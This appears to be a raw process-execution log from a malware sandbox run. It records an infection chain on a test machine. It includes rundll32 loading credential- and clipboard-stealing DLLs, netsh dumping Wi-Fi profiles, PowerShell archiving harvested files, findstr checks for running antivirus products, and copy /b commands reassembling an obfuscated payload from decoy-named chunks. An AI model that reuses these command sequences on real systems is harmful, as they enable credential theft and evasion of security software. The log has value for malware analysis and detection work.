rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
2088rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
2208netsh.exe netsh wlan show profiles
2340powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
296rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main
1688v6Oqdnc.exe "C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
2344HmngBpR.exe "C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe"
2488expand.exe expand Go.pub Go.pub.bat
316tasklist.exe tasklist
2012findstr.exe findstr /I "opssvc wrsa"
2564tasklist.exe tasklist
516findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
2516cmd.exe cmd /c md 353090
1656extrac32.exe extrac32 /Y /E Really.pub
2408findstr.exe findstr /V "posted" Good
1520cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
2772cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
2548Seat.com Seat.com m
1972choice.exe choice /d y /t 5
12089hUDDVk.exe "C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe"
1200pwHxMTy.exe "C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe"
1504T0QdO0l.exe "C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe"
880powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
2840futors.exe "C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe"
2824yUI6F6C.exe "C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe"
916CgmaT61.exe "C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe"
2376cmd.exe cmd.exe /c 67cb736da8518.vbs
3168V0Bt74c.exe "C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe"
32482q1116.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe
24043H65J.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe
2552explorer.exe C:\Windows\Explorer.EXE
1236